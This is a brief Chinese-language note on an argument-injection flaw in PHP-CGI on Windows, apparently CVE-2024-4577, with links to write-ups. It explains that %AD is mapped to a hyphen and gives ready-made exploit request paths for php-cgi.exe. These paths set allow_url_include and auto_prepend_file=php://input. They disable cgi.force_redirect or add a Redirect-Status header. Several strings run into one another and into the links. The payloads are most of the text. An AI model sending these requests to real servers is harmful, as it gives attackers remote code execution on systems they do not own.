漏洞的起因就是字符映射,将%ad映射成了-,导致了cgi修改配置的rce。
利用方式有两种,一种就是直接改cgi.force_redirect,第二种就是header头设置REDIRECT-STATUS
/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input+%ADd+cgi.force_redirect%3d0+%ADd+error_reporting%3d0/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input+%ADd+error_reporting%3d0
Redirect-Status: 1https://wx.zsxq.com/dweb2/index/topic_detail/1522152528151552
https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/
https://wx.zsxq.com/dweb2/index/topic_detail/8855485848442182